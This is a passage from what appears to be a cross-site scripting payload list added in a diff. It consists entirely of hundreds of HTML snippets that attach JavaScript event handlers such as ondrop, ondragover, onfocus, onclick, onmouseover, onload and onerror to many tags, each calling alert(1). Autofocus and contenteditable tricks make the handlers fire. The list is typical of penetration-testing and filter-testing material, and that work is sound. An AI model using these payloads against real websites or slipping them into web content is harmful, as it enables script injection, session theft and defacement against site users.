contenteditable>drag me</div><marquee ondrop=alert(1) contenteditable>drop here</marquee> +<div draggable="true" contenteditable>drag me</div><menu ondragover=alert(1) contenteditable>drop here</menu> +<div draggable="true" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu> +<div draggable="true" contenteditable>drag me</div><menuitem ondragover=alert(1) contenteditable>drop here</menuitem> +<div draggable="true" contenteditable>drag me</div><menuitem ondrop=alert(1) contenteditable>drop here</menuitem> +<div draggable="true" contenteditable>drag me</div><meta ondragover=alert(1) contenteditable>drop here</meta> +<div draggable="true" contenteditable>drag me</div><meta ondrop=alert(1) contenteditable>drop here</meta> +<div draggable="true" contenteditable>drag me</div><meter ondragover=alert(1) contenteditable>drop here</meter> +<div draggable="true" contenteditable>drag me</div><meter ondrop=alert(1) contenteditable>drop here</meter> +<div draggable="true" contenteditable>drag me</div><multicol ondragover=alert(1) contenteditable>drop here</multicol> +<div draggable="true" contenteditable>drag me</div><multicol ondrop=alert(1) contenteditable>drop here</multicol> +<div draggable="true" contenteditable>drag me</div><nav ondragover=alert(1) contenteditable>drop here</nav> +<div draggable="true" contenteditable>drag me</div><nav ondrop=alert(1) contenteditable>drop here</nav> +<div draggable="true" contenteditable>drag me</div><nextid ondragover=alert(1) contenteditable>drop here</nextid> +<div draggable="true" contenteditable>drag me</div><nextid ondrop=alert(1) contenteditable>drop here</nextid> +<div draggable="true" contenteditable>drag me</div><nobr ondragover=alert(1) contenteditable>drop here</nobr> +<div draggable="true" contenteditable>drag me</div><nobr ondrop=alert(1) contenteditable>drop here</nobr> +<div draggable="true" contenteditable>drag me</div><noembed ondragover=alert(1) contenteditable>drop here</noembed> +<div 
draggable="true" contenteditable>drag me</div><noembed ondrop=alert(1) contenteditable>drop here</noembed> +<div draggable="true" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes> +<div draggable="true" contenteditable>drag me</div><noframes ondrop=alert(1) contenteditable>drop here</noframes> +<div draggable="true" contenteditable>drag me</div><noscript ondragover=alert(1) contenteditable>drop here</noscript> +<div draggable="true" contenteditable>drag me</div><noscript ondrop=alert(1) contenteditable>drop here</noscript> +<div draggable="true" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object> +<div draggable="true" contenteditable>drag me</div><object ondrop=alert(1) contenteditable>drop here</object> +<div draggable="true" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol> +<div draggable="true" contenteditable>drag me</div><ol ondrop=alert(1) contenteditable>drop here</ol> +<div draggable="true" contenteditable>drag me</div><optgroup ondragover=alert(1) contenteditable>drop here</optgroup> +<div draggable="true" contenteditable>drag me</div><optgroup ondrop=alert(1) contenteditable>drop here</optgroup> +<div draggable="true" contenteditable>drag me</div><option ondragover=alert(1) contenteditable>drop here</option> +<div draggable="true" contenteditable>drag me</div><option ondrop=alert(1) contenteditable>drop here</option> +<div draggable="true" contenteditable>drag me</div><output ondragover=alert(1) contenteditable>drop here</output> +<div draggable="true" contenteditable>drag me</div><output ondrop=alert(1) contenteditable>drop here</output> +<div draggable="true" contenteditable>drag me</div><p ondragover=alert(1) contenteditable>drop here</p> +<div draggable="true" contenteditable>drag me</div><p ondrop=alert(1) contenteditable>drop here</p> +<div draggable="true" contenteditable>drag me</div><param ondragover=alert(1) 
contenteditable>drop here</param> +<div draggable="true" contenteditable>drag me</div><param ondrop=alert(1) contenteditable>drop here</param> +<div draggable="true" contenteditable>drag me</div><picture ondragover=alert(1) contenteditable>drop here</picture> +<div draggable="true" contenteditable>drag me</div><picture ondrop=alert(1) contenteditable>drop here</picture> +<div draggable="true" contenteditable>drag me</div><plaintext ondragover=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop 
here</rtc> +<div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small> 
+<div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><source ondrop=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><spacer ondragover=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><spacer ondrop=alert(1) contenteditable>drop here</spacer> +<div draggable="true" contenteditable>drag me</div><span ondragover=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><span ondrop=alert(1) contenteditable>drop here</span> +<div draggable="true" contenteditable>drag me</div><strike ondragover=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strike ondrop=alert(1) contenteditable>drop here</strike> +<div draggable="true" contenteditable>drag me</div><strong ondragover=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><strong ondrop=alert(1) contenteditable>drop here</strong> +<div draggable="true" contenteditable>drag me</div><style ondragover=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><style ondrop=alert(1) contenteditable>drop here</style> +<div draggable="true" contenteditable>drag me</div><sub ondragover=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><sub ondrop=alert(1) contenteditable>drop here</sub> +<div draggable="true" contenteditable>drag me</div><summary ondragover=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><summary ondrop=alert(1) contenteditable>drop here</summary> +<div draggable="true" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop 
here</sup> +<div draggable="true" contenteditable>drag me</div><sup ondrop=alert(1) contenteditable>drop here</sup> +<div draggable="true" contenteditable>drag me</div><svg ondragover=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg> +<div draggable="true" contenteditable>drag me</div><table ondragover=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><table ondrop=alert(1) contenteditable>drop here</table> +<div draggable="true" contenteditable>drag me</div><tbody ondragover=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><tbody ondrop=alert(1) contenteditable>drop here</tbody> +<div draggable="true" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><td ondrop=alert(1) contenteditable>drop here</td> +<div draggable="true" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><template ondrop=alert(1) contenteditable>drop here</template> +<div draggable="true" contenteditable>drag me</div><textarea ondragover=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><textarea ondrop=alert(1) contenteditable>drop here</textarea> +<div draggable="true" contenteditable>drag me</div><tfoot ondragover=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><tfoot ondrop=alert(1) contenteditable>drop here</tfoot> +<div draggable="true" contenteditable>drag me</div><th ondragover=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><th ondrop=alert(1) contenteditable>drop here</th> +<div draggable="true" contenteditable>drag me</div><thead ondragover=alert(1) contenteditable>drop here</thead> 
+<div draggable="true" contenteditable>drag me</div><thead ondrop=alert(1) contenteditable>drop here</thead> +<div draggable="true" contenteditable>drag me</div><time ondragover=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><time ondrop=alert(1) contenteditable>drop here</time> +<div draggable="true" contenteditable>drag me</div><title ondragover=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><title ondrop=alert(1) contenteditable>drop here</title> +<div draggable="true" contenteditable>drag me</div><tr ondragover=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><tr ondrop=alert(1) contenteditable>drop here</tr> +<div draggable="true" contenteditable>drag me</div><track ondragover=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><track ondrop=alert(1) contenteditable>drop here</track> +<div draggable="true" contenteditable>drag me</div><tt ondragover=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt> +<div draggable="true" contenteditable>drag me</div><u ondragover=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><u ondrop=alert(1) contenteditable>drop here</u> +<div draggable="true" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><ul ondrop=alert(1) contenteditable>drop here</ul> +<div draggable="true" contenteditable>drag me</div><var ondragover=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><var ondrop=alert(1) contenteditable>drop here</var> +<div draggable="true" contenteditable>drag me</div><video ondragover=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><video 
ondrop=alert(1) contenteditable>drop here</video> +<div draggable="true" contenteditable>drag me</div><wbr ondragover=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><wbr ondrop=alert(1) contenteditable>drop here</wbr> +<div draggable="true" contenteditable>drag me</div><xmp ondragover=alert(1) contenteditable>drop here</xmp> +<div draggable="true" contenteditable>drag me</div><xmp ondrop=alert(1) contenteditable>drop here</xmp> +<div draggable="true" ondrag="alert(1)">test</div> +<div draggable="true" ondragend="alert(1)">test</div> +<div draggable="true" ondragenter="alert(1)">test</div> +<div draggable="true" ondragleave="alert(1)">test</div> +<div draggable="true" ondragstart="alert(1)">test</div> +<div id=x tabindex=1 onactivate=alert(1)></div> +<div id=x tabindex=1 onbeforeactivate=alert(1)></div> +<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus> +<div id=x tabindex=1 ondeactivate=alert(1)></div><input id=y autofocus> +<div id=x tabindex=1 onfocus=alert(1)></div> +<div id=x tabindex=1 onfocusin=alert(1)></div> +<div onbeforecopy="alert(1)" contenteditable>test</div> +<div onbeforecut="alert(1)" contenteditable>test</div> +<div onbeforepaste="alert(1)" contenteditable>test</div> +<div onblur=alert(1) tabindex=1 id=x></div><input autofocus> +<div onclick="alert(1)">test</div> +<div oncontextmenu="alert(1)">test</div> +<div oncopy="alert(1)" contenteditable>test</div> +<div oncut="alert(1)" contenteditable>test</div> +<div ondblclick="alert(1)">test</div> +<div onfocusout=alert(1) tabindex=1 id=x></div><input autofocus> +<div onkeydown="alert(1)" contenteditable>test</div> +<div onkeypress="alert(1)" contenteditable>test</div> +<div onkeyup="alert(1)" contenteditable>test</div> +<div onmousedown="alert(1)">test</div> +<div onmouseenter="alert(1)">test</div> +<div onmouseleave="alert(1)">test</div> +<div onmousemove="alert(1)">test</div> +<div onmouseout="alert(1)">test</div> +<div 
onmouseover="alert(1)">test</div> +<div onmouseup="alert(1)">test</div> +<div onpaste="alert(1)" contenteditable>test</div> +<dl draggable="true" ondrag="alert(1)">test</dl> +<dl draggable="true" ondragend="alert(1)">test</dl> +<dl draggable="true" ondragenter="alert(1)">test</dl> +<dl draggable="true" ondragleave="alert(1)">test</dl> +<dl draggable="true" ondragstart="alert(1)">test</dl> +<dl id=x tabindex=1 onactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforeactivate=alert(1)></dl> +<dl id=x tabindex=1 onbeforedeactivate=alert(1)></dl><input autofocus> +<dl id=x tabindex=1 ondeactivate=alert(1)></dl><input id=y autofocus> +<dl id=x tabindex=1 onfocus=alert(1)></dl> +<dl id=x tabindex=1 onfocusin=alert(1)></dl> +<dl onbeforecopy="alert(1)" contenteditable>test</dl> +<dl onbeforecut="alert(1)" contenteditable>test</dl> +<dl onbeforepaste="alert(1)" contenteditable>test</dl> +<dl onblur=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onclick="alert(1)">test</dl> +<dl oncontextmenu="alert(1)">test</dl> +<dl oncopy="alert(1)" contenteditable>test</dl> +<dl oncut="alert(1)" contenteditable>test</dl> +<dl ondblclick="alert(1)">test</dl> +<dl onfocusout=alert(1) tabindex=1 id=x></dl><input autofocus> +<dl onkeydown="alert(1)" contenteditable>test</dl> +<dl onkeypress="alert(1)" contenteditable>test</dl> +<dl onkeyup="alert(1)" contenteditable>test</dl> +<dl onmousedown="alert(1)">test</dl> +<dl onmouseenter="alert(1)">test</dl> +<dl onmouseleave="alert(1)">test</dl> +<dl onmousemove="alert(1)">test</dl> +<dl onmouseout="alert(1)">test</dl> +<dl onmouseover="alert(1)">test</dl> +<dl onmouseup="alert(1)">test</dl> +<dl onpaste="alert(1)" contenteditable>test</dl> +<dt draggable="true" ondrag="alert(1)">test</dt> +<dt draggable="true" ondragend="alert(1)">test</dt> +<dt draggable="true" ondragenter="alert(1)">test</dt> +<dt draggable="true" ondragleave="alert(1)">test</dt> +<dt draggable="true" ondragstart="alert(1)">test</dt> +<dt id=x tabindex=1 
onactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforeactivate=alert(1)></dt> +<dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus> +<dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus> +<dt id=x tabindex=1 onfocus=alert(1)></dt> +<dt id=x tabindex=1 onfocusin=alert(1)></dt> +<dt onbeforecopy="alert(1)" contenteditable>test</dt> +<dt onbeforecut="alert(1)" contenteditable>test</dt> +<dt onbeforepaste="alert(1)" contenteditable>test</dt> +<dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onclick="alert(1)">test</dt> +<dt oncontextmenu="alert(1)">test</dt> +<dt oncopy="alert(1)" contenteditable>test</dt> +<dt oncut="alert(1)" contenteditable>test</dt> +<dt ondblclick="alert(1)">test</dt> +<dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus> +<dt onkeydown="alert(1)" contenteditable>test</dt> +<dt onkeypress="alert(1)" contenteditable>test</dt> +<dt onkeyup="alert(1)" contenteditable>test</dt> +<dt onmousedown="alert(1)">test</dt> +<dt onmouseenter="alert(1)">test</dt> +<dt onmouseleave="alert(1)">test</dt> +<dt onmousemove="alert(1)">test</dt> +<dt onmouseout="alert(1)">test</dt> +<dt onmouseover="alert(1)">test</dt> +<dt onmouseup="alert(1)">test</dt> +<dt onpaste="alert(1)" contenteditable>test</dt> +<element draggable="true" ondrag="alert(1)">test</element> +<element draggable="true" ondragend="alert(1)">test</element> +<element draggable="true" ondragenter="alert(1)">test</element> +<element draggable="true" ondragleave="alert(1)">test</element> +<element draggable="true" ondragstart="alert(1)">test</element> +<element id=x tabindex=1 onactivate=alert(1)></element> +<element id=x tabindex=1 onbeforeactivate=alert(1)></element> +<element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus> +<element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus> +<element id=x tabindex=1 onfocus=alert(1)></element> +<element id=x tabindex=1 onfocusin=alert(1)></element> +<element 
onbeforecopy="alert(1)" contenteditable>test</element> +<element onbeforecut="alert(1)" contenteditable>test</element> +<element onbeforepaste="alert(1)" contenteditable>test</element> +<element onblur=alert(1) tabindex=1 id=x></element><input autofocus> +<element onclick="alert(1)">test</element> +<element oncontextmenu="alert(1)">test</element> +<element oncopy="alert(1)" contenteditable>test</element> +<element oncut="alert(1)" contenteditable>test</element> +<element ondblclick="alert(1)">test</element> +<element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus> +<element onkeydown="alert(1)" contenteditable>test</element> +<element onkeypress="alert(1)" contenteditable>test</element> +<element onkeyup="alert(1)" contenteditable>test</element> +<element onmousedown="alert(1)">test</element> +<element onmouseenter="alert(1)">test</element> +<element onmouseleave="alert(1)">test</element> +<element onmousemove="alert(1)">test</element> +<element onmouseout="alert(1)">test</element> +<element onmouseover="alert(1)">test</element> +<element onmouseup="alert(1)">test</element> +<element onpaste="alert(1)" contenteditable>test</element> +<em draggable="true" ondrag="alert(1)">test</em> +<em draggable="true" ondragend="alert(1)">test</em> +<em draggable="true" ondragenter="alert(1)">test</em> +<em draggable="true" ondragleave="alert(1)">test</em> +<em draggable="true" ondragstart="alert(1)">test</em> +<em id=x tabindex=1 onactivate=alert(1)></em> +<em id=x tabindex=1 onbeforeactivate=alert(1)></em> +<em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus> +<em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus> +<em id=x tabindex=1 onfocus=alert(1)></em> +<em id=x tabindex=1 onfocusin=alert(1)></em> +<em onbeforecopy="alert(1)" contenteditable>test</em> +<em onbeforecut="alert(1)" contenteditable>test</em> +<em onbeforepaste="alert(1)" contenteditable>test</em> +<em onblur=alert(1) tabindex=1 id=x></em><input autofocus> +<em 
onclick="alert(1)">test</em> +<em oncontextmenu="alert(1)">test</em> +<em oncopy="alert(1)" contenteditable>test</em> +<em oncut="alert(1)" contenteditable>test</em> +<em ondblclick="alert(1)">test</em> +<em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus> +<em onkeydown="alert(1)" contenteditable>test</em> +<em onkeypress="alert(1)" contenteditable>test</em> +<em onkeyup="alert(1)" contenteditable>test</em> +<em onmousedown="alert(1)">test</em> +<em onmouseenter="alert(1)">test</em> +<em onmouseleave="alert(1)">test</em> +<em onmousemove="alert(1)">test</em> +<em onmouseout="alert(1)">test</em> +<em onmouseover="alert(1)">test</em> +<em onmouseup="alert(1)">test</em> +<em onpaste="alert(1)" contenteditable>test</em> +<embed draggable="true" ondrag="alert(1)">test</embed> +<embed draggable="true" ondragend="alert(1)">test</embed> +<embed draggable="true" ondragenter="alert(1)">test</embed> +<embed draggable="true" ondragleave="alert(1)">test</embed> +<embed draggable="true" ondragstart="alert(1)">test</embed> +<embed id=x onfocus=alert(1) type=text/html> +<embed id=x onfocusin=alert(1) type=text/html> +<embed id=x tabindex=1 onactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforeactivate=alert(1)></embed> +<embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus> +<embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus> +<embed onbeforecopy="alert(1)" contenteditable>test</embed> +<embed onbeforecut="alert(1)" contenteditable>test</embed> +<embed onbeforepaste="alert(1)" contenteditable>test</embed> +<embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onclick="alert(1)">test</embed> +<embed oncontextmenu="alert(1)">test</embed> +<embed oncopy="alert(1)" contenteditable>test</embed> +<embed oncut="alert(1)" contenteditable>test</embed> +<embed ondblclick="alert(1)">test</embed> +<embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus> +<embed onkeydown="alert(1)" 
contenteditable>test</embed> +<embed onkeypress="alert(1)" contenteditable>test</embed> +<embed onkeyup="alert(1)" contenteditable>test</embed> +<embed onmousedown="alert(1)">test</embed> +<embed onmouseenter="alert(1)">test</embed> +<embed onmouseleave="alert(1)">test</embed> +<embed onmousemove="alert(1)">test</embed> +<embed onmouseout="alert(1)">test</embed> +<embed onmouseover="alert(1)">test</embed> +<embed onmouseup="alert(1)">test</embed> +<embed onpaste="alert(1)" contenteditable>test</embed> +<embed src=/ onload=alert(1)> +<embed src=1 onerror=alert(1) type=image/gif> +<fieldset draggable="true" ondrag="alert(1)">test</fieldset> +<fieldset draggable="true" ondragend="alert(1)">test</fieldset> +<fieldset draggable="true" ondragenter="alert(1)">test</fieldset> +<fieldset draggable="true" ondragleave="alert(1)">test</fieldset> +<fieldset draggable="true" ondragstart="alert(1)">test</fieldset> +<fieldset id=x tabindex=1 onactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset> +<fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus> +<fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus> +<fieldset id=x tabindex=1 onfocus=alert(1)></fieldset> +<fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset> +<fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforecut="alert(1)" contenteditable>test</fieldset> +<fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset> +<fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onclick="alert(1)">test</fieldset> +<fieldset oncontextmenu="alert(1)">test</fieldset> +<fieldset oncopy="alert(1)" contenteditable>test</fieldset> +<fieldset oncut="alert(1)" contenteditable>test</fieldset> +<fieldset ondblclick="alert(1)">test</fieldset> +<fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus> +<fieldset onkeydown="alert(1)" contenteditable>test</fieldset> 
+<fieldset onkeypress="alert(1)" contenteditable>test</fieldset> +<fieldset onkeyup="alert(1)" contenteditable>test</fieldset> +<fieldset onmousedown="alert(1)">test</fieldset> +<fieldset onmouseenter="alert(1)">test</fieldset> +<fieldset onmouseleave="alert(1)">test</fieldset> +<fieldset onmousemove="alert(1)">test</fieldset> +<fieldset onmouseout="alert(1)">test</fieldset> +<fieldset onmouseover="alert(1)">test</fieldset> +<fieldset onmouseup="alert(1)">test</fieldset> +<fieldset onpaste="alert(1)" contenteditable>test</fieldset> +<figcaption draggable="true" ondrag="alert(1)">test</figcaption> +<figcaption draggable="true" ondragend="alert(1)">test</figcaption> +<figcaption draggable="true" ondragenter="alert(1)">test</figcaption> +<figcaption draggable="true" ondragleave="alert(1)">test</figcaption> +<figcaption draggable="true" ondragstart="alert(1)">test</figcaption> +<figcaption id=x tabindex=1 onactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption> +<figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus> +<figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus> +<figcaption id=x tabindex=1 onfocus=alert(1)></figcaption> +<figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption> +<figcaption onbeforecopy="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforecut="alert(1)" contenteditable>test</figcaption> +<figcaption onbeforepaste="alert(1)" contenteditable>test</figcaption> +<figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption onclick="alert(1)">test</figcaption> +<figcaption oncontextmenu="alert(1)">test</figcaption> +<figcaption oncopy="alert(1)" contenteditable>test</figcaption> +<figcaption oncut="alert(1)" contenteditable>test</figcaption> +<figcaption ondblclick="alert(1)">test</figcaption> +<figcaption onfocusout=alert(1) tabindex=1 id=x></figcaption><input autofocus> +<figcaption 
onkeydown="alert(1)" contenteditable>test</figcaption> +<figcaption onkeypress="alert(1)" contenteditable>test</figcaption> +<figcaption onkeyup="alert(1)" contenteditable>test</figcaption> +<figcaption onmousedown="alert(1)">test</figcaption> +<figcaption onmouseenter="alert(1)">test</figcaption> +<figcaption onmouseleave="alert(1)">test</figcaption> +<figcaption onmousemove="alert(1)">test</figcaption> +<figcaption onmouseout="alert(1)">test</figcaption> +<figcaption onmouseover="alert(1)">test</figcaption> +<figcaption onmouseup="alert(1)">test</figcaption> +<figcaption onpaste="alert(1)" contenteditable>test</figcaption> +<figure draggable="true" ondrag="alert(1)">test</figure> +<figure draggable="true" ondragend="alert(1)">test</figure> +<figure draggable="true" ondragenter="alert(1)">test</figure> +<figure draggable="true" ondragleave="alert(1)">test</figure> +<figure draggable="true" ondragstart="alert(1)">test</figure> +<figure id=x tabindex=1 onactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforeactivate=alert(1)></figure> +<figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus> +<figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus> +<figure id=x tabindex=1 onfocus=alert(1)></figure> +<figure id=x tabindex=1 onfocusin=alert(1)></figure> +<figure onbeforecopy="alert(1)" contenteditable>test</figure> +<figure onbeforecut="alert(1)" contenteditable>test</figure> +<figure onbeforepaste="alert(1)" contenteditable>test</figure> +<figure onblur=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onclick="alert(1)">test</figure> +<figure oncontextmenu="alert(1)">test</figure> +<figure oncopy="alert(1)" contenteditable>test</figure> +<figure oncut="alert(1)" contenteditable>test</figure> +<figure ondblclick="alert(1)">test</figure> +<figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus> +<figure onkeydown="alert(1)" contenteditable>test</figure> +<figure onkeypress="alert(1)" 
contenteditable>test</figure> +<figure onkeyup="alert(1)" contenteditable>test</figure> +<figure onmousedown="alert(1)">test</figure> +<figure onmouseenter="alert(1)">test</figure> +<figure onmouseleave="alert(1)">test</figure> +<figure onmousemove="alert(1)">test</figure> +<figure onmouseout="alert(1)">test</figure> +<figure onmouseover="alert(1)">test</figure> +<figure onmouseup="alert(1)">test</figure> +<figure onpaste="alert(1)" contenteditable>test</figure> +<font draggable="true" ondrag="alert(1)">test</font> +<font draggable="true" ondragend="alert(1)">test</font> +<font draggable="true" ondragenter="alert(1)">test</font> +<font draggable="true" ondragleave="alert(1)">test</font> +<font draggable="true" ondragstart="alert(1)">test</font> +<font id=x tabindex=1 onactivate=alert(1)></font> +<font id=x tabindex=1 onbeforeactivate=alert(1)></font> +<font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus> +<font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus> +<font id=x tabindex=1 onfocus=alert(1)></font> +<font id=x tabindex=1 onfocusin=alert(1)></font> +<font onbeforecopy="alert(1)" contenteditable>test</font> +<font onbeforecut="alert(1)" contenteditable>test</font> +<font onbeforepaste="alert(1)" contenteditable>test</font> +<font onblur=alert(1) tabindex=1 id=x></font><input autofocus> +<font onclick="alert(1)">test</font> +<font oncontextmenu="alert(1)">test</font> +<font oncopy="alert(1)" contenteditable>test</font> +<font oncut="alert(1)" contenteditable>test</font> +<font ondblclick="alert(1)">test</font> +<font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus> +<font onkeydown="alert(1)" contenteditable>test</font> +<font onkeypress="alert(1)" contenteditable>test</font> +<font onkeyup="alert(1)" contenteditable>test</font> +<font onmousedown="alert(1)">test</font> +<font onmouseenter="alert(1)">test</font> +<font onmouseleave="alert(1)">test</font> +<font onmousemove="alert(1)">test</font> +<font 
onmouseout="alert(1)">test</font> +<font onmouseover="alert(1)">test</font> +<font onmouseup="alert(1)">test</font> +<font onpaste="alert(1)" contenteditable>test</font> +<footer draggable="true" ondrag="alert(1)">test</footer> +<footer draggable="true" ondragend="alert(1)">test</footer> +<footer draggable="true" ondragenter="alert(1)">test</footer> +<footer draggable="true" ondragleave="alert(1)">test</footer> +<footer draggable="true" ondragstart="alert(1)">test</footer> +<footer id=x tabindex=1 onactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforeactivate=alert(1)></footer> +<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus> +<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus> +<footer id=x tabindex=1 onfocus=alert(1)></footer> +<footer id=x tabindex=1 onfocusin=alert(1)></footer> +<footer onbeforecopy="alert(1)" contenteditable>test</footer> +<footer onbeforecut="alert(1)" contenteditable>test</footer> +<footer onbeforepaste="alert(1)" 